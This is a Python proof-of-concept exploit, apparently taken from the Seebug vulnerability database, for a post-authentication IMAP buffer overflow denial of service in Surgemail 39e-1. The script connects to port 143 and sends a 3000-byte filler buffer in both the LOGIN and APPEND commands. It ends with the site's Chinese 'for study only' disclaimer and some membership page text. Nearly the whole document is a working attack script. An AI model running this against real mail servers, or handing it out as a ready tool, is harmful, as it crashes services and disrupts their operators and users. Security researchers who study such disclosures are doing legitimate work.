#!/usr/bin/python # # Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS. # Discovered by: Travis Warren # # The IMAP service contains a buffer overflow in the APPEND command. # # import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = '\x41' * 3000 s.connect(('192.168.0.103',143)) s.recv(1024) s.send('A001 LOGIN user@test.com user ' + buffer + '\r\n') s.recv(1024) s.send('A001 APPEND ' + buffer + '\r\n') s.recv(1024) s.close()
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论